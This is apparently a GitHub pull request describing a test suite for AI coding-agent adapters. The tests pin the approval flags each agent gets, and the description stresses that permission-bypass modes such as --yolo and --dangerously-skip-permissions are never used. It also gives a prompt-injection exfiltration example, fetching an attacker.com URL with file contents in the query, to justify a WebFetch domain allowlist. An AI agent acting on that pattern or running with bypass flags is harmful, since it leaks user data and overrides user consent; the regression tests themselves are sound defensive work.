Repository navigation
Test the agent adapters - #48
Merged
Merged
Conversation
Chunk 6. Adds src/agents/adapters.test.ts, 51 tests covering claude-code, codex, gemini and apps. No source changes. The centre of this one is argv. The pre-handoff gate tells the user what the run auto-approves, and these flags are what it actually approves, so they are asserted literally: Gemini gets --approval-mode auto_edit and never --yolo, Codex gets exec --full-auto, Claude Code gets --permission-mode acceptEdits and never --dangerously-skip-permissions. Claude Code's WebFetch scope gets its own test. Unscoped it would be an exfiltration channel under prompt injection — fetch attacker.com with file contents in the query — and the two-domain allowlist is what closes that. The bash allowlist is pinned to dependency installs alone. Stream parsing covers the double-print guard (a result event that just repeats the last assistant message is suppressed), marker extraction from both assistant blocks and the result, the describeToolUse precedence chain, and unparseable lines staying quiet unless --debug. App handoffs cover the parts that fail in the real world: a bundle name claimed only when the bundle exists, a folder-less app never handed a directory, and clipboard or launch failures degrading to instructions instead of throwing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Chunk 6 of the test plan.
src/agents/adapters.test.ts, 51 tests acrossclaude-code,codex,geminiandapps. No source changes.argv is the consent contract
The pre-handoff gate tells the user what the autonomous run auto-approves. These flags are what it actually approves, so they're asserted literally rather than assumed — a flag change that widens the agent's reach without touching the copy is exactly the drift worth catching.
--approval-mode auto_edit, never--yoloexec --full-auto--permission-mode acceptEdits, never--dangerously-skip-permissionsPlus: every terminal agent declares a non-empty
autonomystring (it's the sentence the user consents to), and every app handoff declares none.WebFetch scoping gets its own test
Unscoped,
WebFetchis an exfiltration channel under prompt injection — fetchhttps://attacker.com/?data=<file contents>. The two-domain allowlist is what closes it, so the test asserts exactly those two entries are present and a bareWebFetchis not. The Bash allowlist is pinned to dependency installs alone.Claude Code stream parsing
resultevent normally repeats the final assistant message, so the note only shows when it differs (anerror_max_turnsresult, say). Easy to regress into printing every summary twice.describeToolUseprecedence —file_path>path>command(truncated at 80) >pattern>url> bare name.--debug.App handoffs
The parts that actually fail in the real world:
open -acan't miss.opensFolder: false) is never handed a directory —open -a Claude <path>isn't how it launches.clipboardHoldsPrompt: false; a launch failure produces "couldn't launch … open it yourself"; both failing together still resolves rather than throws.Verification
51 tests passing (104 on this branch: chunk 0 plus this one),
typecheckclean. Mutation-checked the two that matter most — switching Gemini to--yoloand unscopingWebFetch— and confirmed exactly those tests fail, then reverted.Note
Low Risk
Test-only addition; no runtime or security behavior changes, only regression guards for existing adapter argv and handoff logic.
Overview
Adds
src/agents/adapters.test.ts(~51 Vitest cases) with no production code changes. The suite mocks terminal runs, PATH/bundle detection, clipboard, and UI output so adapter behavior can be asserted in isolation.Autonomy / argv contract — Terminal agents (Gemini, Codex, Claude Code) must expose non-empty
autonomycopy and launch with pinned flags (e.g. Geminiauto_editwithout--yolo, Codexexec --full-auto, ClaudeacceptEditson stdin, no skip-permissions). Claude’s--allowedToolsis locked to scoped WebFetch on two Fullstory domains and Bash limited to package installs. App handoffs declare no autonomy.Claude Code streaming — Covers JSON line parsing: user-visible text/actions, tool-use labeling and truncation, telemetry marker stripping, duplicate-result suppression, and debug-only stderr for garbage lines.
Detection & GUI handoffs — PATH/fallback detection for CLIs; apps only advertise macOS bundles when present; launch copies the prompt, opens the project (except folder-less Claude Desktop), and degrades gracefully on clipboard or
openfailures without throwing.Reviewed by Cursor Bugbot for commit e6b08b1. Bugbot is set up for automated code reviews on this repo. Configure here.